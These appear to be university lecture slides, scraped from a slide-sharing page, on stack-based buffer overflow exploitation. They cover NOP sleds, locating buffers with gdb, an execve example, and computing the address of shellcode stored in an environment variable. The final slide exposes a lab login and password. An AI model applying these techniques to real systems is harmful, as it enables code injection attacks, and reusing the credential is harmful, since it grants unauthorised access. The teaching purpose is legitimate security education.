Upload
bruis
View
26
Download
0
Embed Size (px)
DESCRIPTION
Stack-based buffer overflows, part 2. Yves Younan DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium [email protected]. Overview. Code injection. Code injection. Finding the inserted code is sometimes a problem - PowerPoint PPT Presentation
Citation preview
Stack-based buffer overflows, part 2
Yves YounanDistriNet, Department of Computer Science
Katholieke Universiteit LeuvenBelgium
Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks March 22, 2005 - 2
Overview
Code injection
Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks March 22, 2005 - 3
Code injection
Finding the inserted code is sometimes a problem
Often an attacker will fill a buffer with nops and place the shellcode at the end
If he misses the address he may end up in the nops
Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks March 22, 2005 - 4
Gdb intro
Compile code with -g for debugging information Gdb program
break main -> tells the debugger to stop when main is reached
run -> run program x buffer -> prints out the contents of buffer (and address)
If the shellcode is stored in the buffer, that address will be what to overwrite the return address with
Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks March 22, 2005 - 5
Execve
Execve allows execution of a programint execve(const char *filename, char *const
argv [], char *const envp[]);Must pass an array of arguments, note that the
program name is argument 0, terminated with NULL
Must also pass an array of environment variables, terminated with NULL
Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks March 22, 2005 - 6
Execve
#include <unistd.h> Int main (int argc, char **argv) { char *execargv[3] = { "/bin/ls", "--color=always",
NULL }; char *env[2] = { "TEST=1", NULL }; execve(execargv[0],execargv,env); }
Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks March 22, 2005 - 7
Finding inserted code
Generally (on kernels < 2.6) the stack will start at a static address
Finding shell code means running the program with a fixed set of arguments/fixed environment
This will result in the same address Not very precise, small change can result in different
location of code Not mandatory to put shellcode in buffer used to overflow Pass as environment variable
Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks March 22, 2005 - 8
Controlling the environment
Program name
High addr
Low addr
0,0,0,0Stack start:0xBFFFFFFF
Env var n
Env var n-1
…
Env var 0
Arg n
Arg n-1
…
Arg 0
Passing shellcode as environment variable:
Stack start - 4 null bytes - strlen(program name) - - null byte (program name)- strlen(shellcode)
0xBFFFFFFF - 4 - strlen(program name) - - 1- strlen(shellcode)
Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks March 22, 2005 - 9
Conclusion
Follow “Gera’s Insecure Programming by example”:http://community.corest.com/~gera/InsecureProgram
ming/Login/pass for the computers: cstudy/distrinet